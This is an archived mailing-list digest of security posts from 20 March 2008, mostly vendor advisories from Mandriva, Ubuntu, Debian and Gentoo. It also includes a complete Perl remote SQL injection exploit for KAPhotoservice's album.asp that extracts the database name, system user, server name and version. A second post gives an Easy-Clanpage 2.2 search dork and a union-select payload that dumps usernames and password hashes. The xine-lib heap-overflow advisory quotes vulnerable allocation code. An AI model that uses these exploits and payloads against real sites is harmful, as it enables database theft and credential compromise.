KAPhotoservice (album.asp) Remote SQL Injection Exploit

2008-03-20 Thread sys-project
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]


[+] Info:

[~] Software: KAPhotoservice (Payment)
[~] Demo: http://www.kaphotoservice.com/photoservice/
[~] Exploit: Remote SQL Injection [High]
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Vuln File: album.asp

[+] Exploit:

#!/usr/bin/perl
# KAPhotoservice - Remote SQL Injection Exploit
# Code by JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com

use IO::Socket::INET;
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

# Clear the terminal; on Windows also set the window title and colour.
sub lw
{
    my $SO = $^O;
    my $linux = "";
    if (index(lc($SO),"win")!=-1){
        $linux="0";
    }else{
        $linux="1";
    }
    if($linux){
        system("clear");
    }
    else{
        system("cls");
        system ("title KAPhotoservice - Remote SQL Injection Exploit");
        system ("color 02");
    }
}

#*** expl **

&lw;

print "\t\t\n\n";
print "\t\t#KAPhotoservice - Remote SQL Injection Exploit #\n\n";
print "\t\t#by JosS   #\n\n";
print "\t\t\n\n";

$host=$ARGV[0];
chop $host;
$host=$host."/album.asp?cat=&apage=&albumid=";

if(!$ARGV[0]) {
    print "\n[x] KAPhotoservice - Remote SQL Injection Exploit\n";
    print "[x] written by JosS - sys-project[at]hotmail.com\n";
    print "[x] usage: perl $0 [host]\n";
    print "[x] example: http://host.com/PHPWebquest\n";
    exit(1);
}

# One probe per value; each forces a type-conversion error whose message
# echoes the value back in the page.
@comando=("1+and+1=convert(int,db_name())","1+and+1=convert(int,system_user)","1+and+1=convert(int,[EMAIL PROTECTED]@servername)--",'1+and+1=convert(int,@@version)--');

for ($i=0;$i<=3;$i++)
{
    my $final = $host.$comando[$i];
    my $ua = LWP::UserAgent->new;
    my $req = HTTP::Request->new(GET => $final);
    $doc = $ua->request($req)->as_string;

    # The SQL Server conversion error text ("... value 'X' to ...") carries
    # the leaked value; the regexes below pull it out of the response.
    if ( $doc =~ /Syntax\s(.*)<\/font>/mosix )
    {
        if ($comando[$i] eq "1+and+1=convert(int,db_name())")
        {
            print "db_name:\n";
            $dbname = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
            print "$dbname\n\n";
        }

        if ($comando[$i] eq "1+and+1=convert(int,system_user)")
        {
            print "system_user:\n";
            $systemuser = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
            print "$systemuser\n\n";
        }

        if ($comando[$i] eq "1+and+1=convert(int,[EMAIL PROTECTED]@servername)--")
        {
            print "servername:\n";
            $servername = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
            print "$servername\n\n";
        }

        if ($comando[$i] eq '1+and+1=convert(int,@@version)--')
        {
            print "version:\n";
            $version = $1 if ($doc =~ /.*?value\s'(.*?)'\sto.*/sm);
            print "$version\n\n";
        }
    } # close of the main if
} # close of the for loop



[ MDVSA-2008:073 ] - Updated perl-Net-DNS packages fix DoS vulnerability

2008-03-20 Thread security


 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:073
 http://www.mandriva.com/security/
 ___
 
 Package : perl-Net-DNS
 Date: March 20, 2008
 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 A vulnerability in the Net::DNS perl module was found that could
 allow remote attackers to cause a denial of service via a crafted
 DNS response.
 
 The updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6341
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 1cf2397dcfe207d625bd24d1d7fc744a  
2007.0/i586/perl-Net-DNS-0.58-1.2mdv2007.0.i586.rpm 
 434fdd9456118124117a26509c6d1674  
2007.0/SRPMS/perl-Net-DNS-0.58-1.2mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 374101d8c50675d8032c5695dfb0866f  
2007.0/x86_64/perl-Net-DNS-0.58-1.2mdv2007.0.x86_64.rpm 
 434fdd9456118124117a26509c6d1674  
2007.0/SRPMS/perl-Net-DNS-0.58-1.2mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 8ff35127ae1c20c0b4e4cf3734b41d78  
2007.1/i586/perl-Net-DNS-0.59-1.2mdv2007.1.i586.rpm 
 0630c817a581736750b3aa3a36330442  
2007.1/SRPMS/perl-Net-DNS-0.59-1.2mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 2db71882e00490ed228d3544e73d5dfa  
2007.1/x86_64/perl-Net-DNS-0.59-1.2mdv2007.1.x86_64.rpm 
 0630c817a581736750b3aa3a36330442  
2007.1/SRPMS/perl-Net-DNS-0.59-1.2mdv2007.1.src.rpm

 Mandriva Linux 2008.0:
 46454d0d2ffbccc32875d38428f5dbb7  
2008.0/i586/perl-Net-DNS-0.61-1.1mdv2008.0.i586.rpm 
 0dd436fba91470dbd4cc4a5371cfa909  
2008.0/SRPMS/perl-Net-DNS-0.61-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 3724958b2631242743be3d24ed463e5f  
2008.0/x86_64/perl-Net-DNS-0.61-1.1mdv2008.0.x86_64.rpm 
 0dd436fba91470dbd4cc4a5371cfa909  
2008.0/SRPMS/perl-Net-DNS-0.61-1.1mdv2008.0.src.rpm

 Corporate 3.0:
 34228478b5f31c0a2c9beb80de8a004b  
corporate/3.0/i586/perl-Net-DNS-0.39-2.2.C30mdk.i586.rpm 
 8846ab7ae3ecf66ee93666e4551e091b  
corporate/3.0/SRPMS/perl-Net-DNS-0.39-2.2.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 9d62397d900754063b46a1f6a7dcae9c  
corporate/3.0/x86_64/perl-Net-DNS-0.39-2.2.C30mdk.x86_64.rpm 
 8846ab7ae3ecf66ee93666e4551e091b  
corporate/3.0/SRPMS/perl-Net-DNS-0.39-2.2.C30mdk.src.rpm

 Corporate 4.0:
 57bb9572548a1727cdfde07176a55fc2  
corporate/4.0/i586/perl-Net-DNS-0.52-1.2.20060mlcs4.i586.rpm 
 cd1731f072ad841c1244b6e873226422  
corporate/4.0/SRPMS/perl-Net-DNS-0.52-1.2.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 454f468cd925c1fccdf20751ac884dd9  
corporate/4.0/x86_64/perl-Net-DNS-0.52-1.2.20060mlcs4.x86_64.rpm 
 cd1731f072ad841c1244b6e873226422  
corporate/4.0/SRPMS/perl-Net-DNS-0.52-1.2.20060mlcs4.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  



[USN-589-1] unzip vulnerability

2008-03-20 Thread Kees Cook
=== 
Ubuntu Security Notice USN-589-1 March 20, 2008
unzip vulnerability
CVE-2008-0888
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  unzip   5.52-6ubuntu4.1

Ubuntu 6.10:
  unzip   5.52-8ubuntu1.1

Ubuntu 7.04:
  unzip   5.52-9ubuntu3.1

Ubuntu 7.10:
  unzip   5.52-10ubuntu1.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Tavis Ormandy discovered that unzip did not correctly clean up pointers.
If a user or automated service was tricked into processing a specially
crafted ZIP archive, a remote attacker could execute arbitrary code with
user privileges.



Multiple heap overflows in xine-lib 1.1.11

2008-03-20 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  xine-lib
  http://xinehq.de
Versions: <= 1.1.11
Platforms:Linux, *BSD, Solaris, Irix, MacOSX, Windows and others
Bugs: A] heap-overflow in demux_flv
  B] heap-overflow in demux_qt
  C] heap-overflow in demux_real
  D] heap-overflow in demux_wc3movie
  E] heap-overflow in ebml
  F] heap-overflow in demux_film
Exploitation: local
Date: 20 Mar 2008
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


From the developers' website:
"xine is a free (gpl-licensed) high-performance, portable and reusable
multimedia playback engine. xine itself is a shared library with an
easy to use, yet powerful API  which is used by many applications for
smooth video playback and video processing purposes."

The library and parts of its source code are widely used in many open
source players and projects.


###

===
2) Bugs
===


xine-lib is affected by various heap overflow vulnerabilities caused by
the wrong 32 bit calculation of the amount of memory to allocate for
some destination buffers and arrays.
These bugs allow an attacker to control some registers or directly the
code flow (like with demux_qt), which could lead to the execution of
malicious code.
For brevity, only the instructions in the source code which perform
these bad allocations are shown.


-
A] heap-overflow in demux_flv
-

From src/demuxers/demux_flv.c:

static int parse_flv_var(demux_flv_t *this, 
 unsigned char *buf, int size, char *key, int keylen) {
  ...
  this->index = xine_xmalloc(num*sizeof(flv_index_entry_t));
  ...
  this->index = xine_xmalloc(num*sizeof(flv_index_entry_t));



B] heap-overflow in demux_qt


Practically almost any allocation instruction in
src/demuxers/demux_qt.c is vulnerable to various types of heap
overflows.


--
C] heap-overflow in demux_real
--

From src/demuxers/demux_real.c:

static void real_parse_index(demux_real_t *this) {
...
*index = xine_xmalloc(entries * sizeof(real_index_entry_t));


--
D] heap-overflow in demux_wc3movie
--

From src/demuxers/demux_wc3movie.c:

static int open_mve_file(demux_mve_t *this) {
  ...
  this->palettes = xine_xmalloc(this->number_of_shots * PALETTE_SIZE *
sizeof(palette_entry_t));

Note that the output buffer is filled using a special lookup table.



E] heap-overflow in ebml


From src/demuxers/ebml.c:

int ebml_check_header(ebml_parser_t *ebml) {
...
char *text = malloc(elem.len + 1);


--
F] heap-overflow in demux_film
--

From src/demuxers/demux_film.c:

static int open_film_file(demux_film_t *film) {
  ...
  film->sample_table =
xine_xmalloc(film->sample_count * sizeof(film_sample_t));


###

===
3) The Code
===


http://aluigi.org/poc/xinehof.zip


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org
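The allocation pattern the advisory describes, written out as an added example (this is not xine-lib code): the entry count read from the file is multiplied by the element size in explicit 32-bit arithmetic, as on a 32-bit build, beside the overflow check a demuxer should apply before allocating. index_entry_t, read_be32, checked_index_bytes and alloc_index are constructed names; the 16-byte entry layout, the sanity cap and the header bytes are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Stand-in for the per-demuxer index entry types named in the advisory
 * (flv_index_entry_t, real_index_entry_t, ...): a constructed 16-byte shape. */
typedef struct {
    uint64_t offset;    /* byte offset of the sample in the file */
    uint64_t pts;       /* presentation timestamp */
} index_entry_t;

/* Reads a 4-byte big-endian count the way a demuxer takes an entry count
 * from a file header: the value is entirely attacker controlled. */
uint32_t read_be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* The flawed computation, modelled in 32-bit arithmetic: num * sizeof()
 * wraps modulo 2^32, so a huge count yields a tiny buffer that the
 * following fill loop (which trusts num) then overruns. */
uint32_t unchecked_index_bytes(uint32_t num)
{
    return num * (uint32_t)sizeof(index_entry_t);
}

/* Overflow-safe version: refuse any count whose product would not fit.
 * Returns 1 and stores the size, or 0 when the file must be rejected. */
int checked_index_bytes(uint32_t num, uint32_t *bytes)
{
    const uint32_t elem = (uint32_t)sizeof(index_entry_t);
    if (num > UINT32_MAX / elem)
        return 0;                        /* would wrap */
    *bytes = num * elem;
    return 1;
}

/* Allocation wrapper a demuxer should use: NULL on overflow, on an
 * implausible count (max_entries is a per-format sanity cap) or on OOM.
 * calloc() is used because it also checks num * size itself. */
index_entry_t *alloc_index(uint32_t num, uint32_t max_entries)
{
    uint32_t bytes;
    if (num > max_entries || !checked_index_bytes(num, &bytes))
        return NULL;
    return calloc(num, sizeof(index_entry_t));
}

int main(void)
{
    /* Constructed header bytes: count 0x10000001 (268,435,457 entries). */
    const unsigned char hdr[4] = { 0x10, 0x00, 0x00, 0x01 };
    uint32_t num = read_be32(hdr), bytes;

    printf("count=%u  unchecked size=%u bytes\n", num, unchecked_index_bytes(num));
    if (!checked_index_bytes(num, &bytes))
        printf("checked: rejected, %u * %zu overflows 32 bits\n",
               num, sizeof(index_entry_t));

    index_entry_t *idx = alloc_index(1000, 1u << 20);
    printf("alloc_index(1000) -> %s\n", idx ? "ok" : "NULL");
    free(idx);
    return 0;
}
```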


[ MDVSA-2008:072 ] - Updated kernel packages fix vulnerability

2008-03-20 Thread security


 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:072
 http://www.mandriva.com/security/
 ___
 
 Package : kernel
 Date: March 20, 2008
 Affected: Corporate 3.0, Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 The Linux kernel prior to 2.6.22.17, when using certain drivers
 that register a fault handler that does not perform range checks,
 allowed local users to access kernel memory via an out-of-range offset
 (CVE-2008-0007).
 
 Additionally, this kernel fixes a JBD checkpoint memory leak bug.
 
 To update your kernel, please follow the directions located at:
 
   http://www.mandriva.com/en/security/kernelupdate
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0007
 ___
 
 Updated Packages:
 
 Corporate 3.0:
 02a9abf32ab0acd35b367cef34d60e91  
corporate/3.0/i586/kernel-2.6.3.38mdk-1-1mdk.i586.rpm
 1926b9663ebce026d6ef0cc4b17c8900  
corporate/3.0/i586/kernel-BOOT-2.6.3.38mdk-1-1mdk.i586.rpm
 21affa41dca0a6545c75b45472d5508d  
corporate/3.0/i586/kernel-doc-2.6.3-38mdk.i586.rpm
 11a27b6746383fc05398d88819262a15  
corporate/3.0/i586/kernel-enterprise-2.6.3.38mdk-1-1mdk.i586.rpm
 d64c328410eabb26cb74fcc526c8078d  
corporate/3.0/i586/kernel-i686-up-4GB-2.6.3.38mdk-1-1mdk.i586.rpm
 c683085999e3e7e94fc219225dadc842  
corporate/3.0/i586/kernel-p3-smp-64GB-2.6.3.38mdk-1-1mdk.i586.rpm
 3ebbffdc4bc4931948d4b7fe49c44021  
corporate/3.0/i586/kernel-secure-2.6.3.38mdk-1-1mdk.i586.rpm
 6ce3bbd2c69db61e54a0903b42d64e8a  
corporate/3.0/i586/kernel-smp-2.6.3.38mdk-1-1mdk.i586.rpm
 cde3607985288c7286886bf8762850ea  
corporate/3.0/i586/kernel-source-2.6.3-38mdk.i586.rpm
 1262426cd7186f9a4e6e8e51d656776a  
corporate/3.0/i586/kernel-source-stripped-2.6.3-38mdk.i586.rpm 
 ec8008a027b33c8f07c561ac28451081  
corporate/3.0/SRPMS/kernel-2.6.3.38mdk-1-1mdk.src.rpm

 Corporate 3.0/X86_64:
 b0885f347038ab0f9e28f89cbcaf9abf  
corporate/3.0/x86_64/kernel-2.6.3.38mdk-1-1mdk.x86_64.rpm
 6c4779262b7f478ec5c7af9a6a0882cc  
corporate/3.0/x86_64/kernel-BOOT-2.6.3.38mdk-1-1mdk.x86_64.rpm
 b0e5f311e37553ccc779bc1c2699d6d8  
corporate/3.0/x86_64/kernel-doc-2.6.3-38mdk.x86_64.rpm
 cd4a1452a1b420e88792b23c9c63ddf6  
corporate/3.0/x86_64/kernel-secure-2.6.3.38mdk-1-1mdk.x86_64.rpm
 eb77a0239c0b8673d1027d897ba7261b  
corporate/3.0/x86_64/kernel-smp-2.6.3.38mdk-1-1mdk.x86_64.rpm
 424a83259a0a6f12426056230640d71f  
corporate/3.0/x86_64/kernel-source-2.6.3-38mdk.x86_64.rpm
 6ca7e51f1200272a1848310b2f9f54d5  
corporate/3.0/x86_64/kernel-source-stripped-2.6.3-38mdk.x86_64.rpm 
 ec8008a027b33c8f07c561ac28451081  
corporate/3.0/SRPMS/kernel-2.6.3.38mdk-1-1mdk.src.rpm

 Multi Network Firewall 2.0:
 cddca9d5e516af19ef235d575b964e7d  
mnf/2.0/i586/kernel-2.6.3.38mdk-1-1mdk.i586.rpm
 e283b1cd0a86ec26940561a93fa1f702  
mnf/2.0/i586/kernel-i686-up-4GB-2.6.3.38mdk-1-1mdk.i586.rpm
 d9ac1515cb52c4bb67f010fcc4b921c8  
mnf/2.0/i586/kernel-p3-smp-64GB-2.6.3.38mdk-1-1mdk.i586.rpm
 2d9f4e7b854c703701d9c8ec2e54029a  
mnf/2.0/i586/kernel-secure-2.6.3.38mdk-1-1mdk.i586.rpm
 5ed5914f0dee93412a8093ff9422a451  
mnf/2.0/i586/kernel-smp-2.6.3.38mdk-1-1mdk.i586.rpm 
 b0303437993328b249575c512a2177c3  
mnf/2.0/SRPMS/kernel-2.6.3.38mdk-1-1mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  



Note about recently publicized CA BrightStor ActiveX exploit code

2008-03-20 Thread Williams, James K

CA is reviewing exploit code that was posted on 2008-03-16 to the 
Milw0rm exploit archive web site.  This exploit code is 
potentially associated with vulnerabilities that may exist in CA 
BrightStor ARCserve Backup for Laptops and Desktops and/or related 
products.  CA will issue an advisory after we have completed our 
initial investigation.

Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research



[SECURITY] [DSA 1522-1] New xwine packages fix several vulnerabilities

2008-03-20 Thread Steve Kemp

- 
Debian Security Advisory DSA-1526-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Steve Kemp
March 20, 2008http://www.debian.org/security/faq
- 

Package: xwine
Vulnerability  : various
Problem type   : local
Debian-specific: no
CVE Id(s)  : CVE-2008-0930 CVE-2008-0931

Steve Kemp from the Debian Security Audit project discovered several local
vulnerabilities in xwine, a graphical user interface for the WINE emulator.

The Common Vulnerabilities and Exposures project identifies the following
problems:

CVE-2008-0930
  The xwine command makes unsafe use of local temporary files when
  printing.  This could allow the removal of arbitrary files belonging
  to users who invoke the program.

CVE-2008-0931
  The xwine command changes the permissions of the global WINE configuration
  file such that it is world-writable.  This could allow local users to edit
  it such that arbitrary commands could be executed whenever any local user
  executed a program under WINE.

For the stable distribution (etch), these problems have been fixed in version
1.0.1-1etch1.

We recommend that you upgrade your xwine package.


Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---



  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show ' and http://packages.debian.org/



[USN-588-1] MySQL vulnerabilities

2008-03-20 Thread Jamie Strandboge
=== 
Ubuntu Security Notice USN-588-1 March 19, 2008
mysql-dfsg-5.0 vulnerabilities
CVE-2006-7232, CVE-2007-2692, CVE-2007-6303, CVE-2008-0226,
CVE-2008-0227
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  mysql-server-5.05.0.22-0ubuntu6.06.8

Ubuntu 6.10:
  mysql-server-5.05.0.24a-9ubuntu2.4

Ubuntu 7.04:
  mysql-server-5.05.0.38-0ubuntu1.4

Ubuntu 7.10:
  mysql-server-5.05.0.45-1ubuntu3.3

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Masaaki Hirose discovered that MySQL could be made to dereference
a NULL pointer. An authenticated user could cause a denial of service
(application crash) via an EXPLAIN SELECT FROM on the INFORMATION_SCHEMA
table. This issue only affects Ubuntu 6.06 and 6.10. (CVE-2006-7232)

Alexander Nozdrin discovered that MySQL did not restore database access
privileges when returning from SQL SECURITY INVOKER stored routines. An
authenticated user could exploit this to gain privileges. This issue
does not affect Ubuntu 7.10. (CVE-2007-2692)

Martin Friebe discovered that MySQL did not properly update the DEFINER
value of an altered view. An authenticated user could use CREATE SQL
SECURITY DEFINER VIEW and ALTER VIEW statements to gain privileges.
(CVE-2007-6303)

Luigi Auriemma discovered that yaSSL as included in MySQL did not
properly validate its input. A remote attacker could send crafted
requests and cause a denial of service or possibly execute arbitrary
code. This issue did not affect Ubuntu 6.06 in the default installation.
(CVE-2008-0226, CVE-2008-0227)



[SECURITY] [DSA 1525-1] New asterisk packages fix several vulnerabilities

2008-03-20 Thread Moritz Muehlenhoff

- 
Debian Security Advisory DSA-1525-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
March 20, 2008http://www.debian.org/security/faq
- 

Package: asterisk
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2007-6430 CVE-2008-1332 CVE-2008-1333

Several remote vulnerabilities have been discovered in Asterisk, a free
software PBX and telephony toolkit. The Common Vulnerabilities and
Exposures project identifies the following problems:

CVE-2007-6430

Tilghman Lesher discovered that database-based registrations are
insufficiently validated. This only affects setups which are
configured to run without a password and with only host-based
authentication.

CVE-2008-1332

Jason Parker discovered that insufficient validation of From:
headers inside the SIP channel driver may lead to authentication
bypass and the potential external initiation of calls.

This update also fixes a format string vulnerability, which can only
be triggered through configuration files under control of the local
administrator. In later releases of Asterisk this issue is remotely
exploitable and tracked as CVE-2008-1333.

For the stable distribution (etch), these problems have been fixed in
version 1:1.2.13~dfsg-2etch3.

The status of the old stable distribution (sarge) is currently being
investigated. If affected, an update will be released through
security.debian.org.

We recommend that you upgrade your asterisk packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 4.0 (stable)
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.


Easy-Clanpage 2.2 (id) Remote SQL Injection Vulnerability

2008-03-20 Thread info
##
## Easy-Clanpage v2.2
## SQL Injection VuLnerabiLity
##
#
# AUTHOR   : MadNet
# HOMEPAGE : http://www.Shadowturk.org/
# Mail     : MadNet[at]hackertr[dot]org
#
# Source : http://easy-clanpage.de/?section=downloads&show=viewdownload&id=14
#
# Dork : "Easy-Clanpage v2.2"
#
# Vuln File :
# /inc/module/online.php
#
# EXPLOIT :
# http://www.[site].com/[path]/?section=user&action=details&id=
#
# EXAMPLE :
# -1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*
#
##
# www.ShadowTURK.Org
##

Thanks : Str0ke and Milw0rm

##



Pizco vulnerable to buffer overflow in activex

2008-03-20 Thread david130490
It's possible that users that use Pizco were vulnerable to the same
vulnerability that Elazar Broad found in "Aurigma ImageUploader4.ocx".

The post is this:

http://www.securityfocus.com/bid/27539

The version of ImageUploader4 is 4.1.36.0

And I say that it's possible because I found a site where I downloaded it, but I
didn't see where the ActiveX control is used.

Web with the vulnerable control:

http://cdnimg.piczo.com/images/uploader/piczo_fast_uploader.cab





[SECURITY] [DSA 1506-2] New iceape packages fix regression

2008-03-20 Thread Moritz Muehlenhoff

- 
Debian Security Advisory DSA-1506-2  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
March 20, 2008http://www.debian.org/security/faq
- 

Package: iceape
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2008-0412 CVE-2008-0413 CVE-2008-0414 CVE-2008-0415
 CVE-2008-0417 CVE-2008-0418 CVE-2008-0419 CVE-2008-0591
 CVE-2008-0592 CVE-2008-0593 CVE-2008-0594

A regression has been fixed in iceape's frame handling code. For
reference you can find the original update below:

Several remote vulnerabilities have been discovered in the Iceape internet
suite, an unbranded version of the Seamonkey Internet Suite. The Common
Vulnerabilities and Exposures project identifies the following problems:

CVE-2008-0412

Jesse Ruderman, Kai Engert, Martijn Wargers, Mats Palmgren and Paul
Nickerson discovered crashes in the layout engine, which might allow
the execution of arbitrary code.

CVE-2008-0413

Carsten Book, Wesley Garland, Igor Bukanov, "moz_bug_r_a4", "shutdown",
Philip Taylor and "tgirmann" discovered crashes in the Javascript
engine, which might allow the execution of arbitrary code.

CVE-2008-0414

"hong" and Gregory Fleisher discovered that file input focus
vulnerabilities in the file upload control could allow information
disclosure of local files.

CVE-2008-0415

"moz_bug_r_a4" and Boris Zbarsky discovered several
vulnerabilities in Javascript handling, which could allow
privilege escalation.

CVE-2008-0417

Justin Dolske discovered that the password storage mechanism could
be abused by malicious web sites to corrupt existing saved passwords.

CVE-2008-0418

Gerry Eisenhaur and "moz_bug_r_a4" discovered that a directory
traversal vulnerability in chrome: URI handling could lead to
information disclosure.

CVE-2008-0419

David Bloom discovered a race condition in the image handling of
designMode elements, which can lead to information disclosure or
potentially the execution of arbitrary code.

CVE-2008-0591

Michal Zalewski discovered that timers protecting security-sensitive
dialogs (which disable dialog elements until a timeout is reached)
could be bypassed by window focus changes through Javascript.

CVE-2008-0592

It was discovered that malformed content declarations of saved
attachments could prevent a user from opening local files
with a ".txt" file name, resulting in minor denial of service.

CVE-2008-0593

Martin Straka discovered that insecure stylesheet handling during
redirects could lead to information disclosure.

CVE-2008-0594

Emil Ljungdahl and Lars-Olof Moilanen discovered that phishing
protections could be bypassed with <div> elements.

For the stable distribution (etch), these problems have been fixed in
version 1.0.12~pre080131b-0etch2.

The Mozilla releases from the old stable distribution (sarge) are no
longer supported with security updates.

We recommend that you upgrade your iceape packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 4.0 (stable)
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:


Architecture independent packages:


[ GLSA 200803-30 ] ssl-cert eclass: Certificate disclosure

2008-03-20 Thread Robert Buchholz
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200803-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: ssl-cert eclass: Certificate disclosure
  Date: March 20, 2008
  Bugs: #174759
ID: 200803-30

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


An error in the usage of the ssl-cert eclass within multiple ebuilds
might allow for disclosure of generated SSL private keys.

Background
==

The ssl-cert eclass is a code module used by Gentoo ebuilds to generate
SSL certificates.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  app-admin/conserver   < 8.1.16  >= 8.1.16
  2  mail-mta/postfix < 2.4.6-r2   >= 2.4.6-r2
  *>= 2.3.8-r1
 *>= 2.2.11-r1
  3  net-ftp/netkit-ftpd   < 0.17-r7>= 0.17-r7
  4  net-im/ejabberd< 1.1.3   >= 1.1.3
  5  net-irc/unrealircd   < 3.2.7-r2   >= 3.2.7-r2
  6  net-mail/cyrus-imapd < 2.3.9-r1   >= 2.3.9-r1
  7  net-mail/dovecot  < 1.0.10  >= 1.0.10
  8  net-misc/stunnel  < 4.21-r1>= 4.21-r1
 < 4.0
  9  net-nntp/inn < 2.4.3-r1   >= 2.4.3-r1
---
 9 affected packages on all of their supported architectures.
---

Description
===

Robin Johnson reported that the docert() function provided by
ssl-cert.eclass can be called by source building stages of an ebuild,
such as src_compile() or src_install(), which will result in the
generated SSL keys being included inside binary packages (binpkgs).

Impact
==

A local attacker could recover the SSL keys from publicly readable
binary packages when "emerge" is called with the "--buildpkg (-b)" or
"--buildpkgonly (-B)" option. Remote attackers can recover these keys
if the packages are served to a network. Binary packages built using
"quickpkg" are not affected.

Workaround
==

Do not use pre-generated SSL keys, but use keys that were generated
using a different Certificate Authority.

Resolution
==

Upgrading to newer versions of the above packages will neither remove
possibly compromised SSL certificates, nor old binary packages. Please
remove the certificates installed by Portage, and then emerge an
upgrade to the package.

All Conserver users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-admin/conserver-8.1.16"

All Postfix 2.4 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=mail-mta/postfix-2.4.6-r2"

All Postfix 2.3 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=mail-mta/postfix-2.3.8-r1"

All Postfix 2.2 users should upgrade to the latest version:

# emerge --sync
